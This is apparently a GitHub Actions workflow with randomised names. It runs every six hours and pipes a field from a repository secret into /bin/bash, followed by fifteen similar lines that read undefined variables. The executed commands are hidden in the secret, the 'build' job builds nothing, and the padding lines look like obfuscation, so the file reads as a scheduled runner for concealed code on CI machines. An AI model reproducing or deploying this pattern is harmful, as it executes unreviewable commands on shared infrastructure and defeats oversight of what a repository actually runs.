name: xianghuaguo3451

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          qc17: ${{ secrets.qc17 }}
        run: |
          echo $qc17 | jq -r .gdltc22120 | /bin/bash
          echo $hitv182 | jq -r .aqvq1045 | /bin/bash
          echo $dbjeu8631 | jq -r .lc24 | /bin/bash
          echo $vy51 | jq -r .zoi4923 | /bin/bash
          echo $vs6319 | jq -r .va9 | /bin/bash
          echo $yncj3472 | jq -r .djg01896 | /bin/bash
          echo $f4210 | jq -r .e4 | /bin/bash
          echo $jj57 | jq -r .m6278 | /bin/bash
          echo $frblx70 | jq -r .t3 | /bin/bash
          echo $jks94228 | jq -r .tea9 | /bin/bash
          echo $ujq154 | jq -r .yjs85 | /bin/bash
          echo $s208 | jq -r .zv34931 | /bin/bash
          echo $dbflh5 | jq -r .e19 | /bin/bash
          echo $xc0555 | jq -r .gliof99693 | /bin/bash
          echo $hiel8 | jq -r .mll31979 | /bin/bash
          echo $izfr8 | jq -r .xidnv699 | /bin/bash

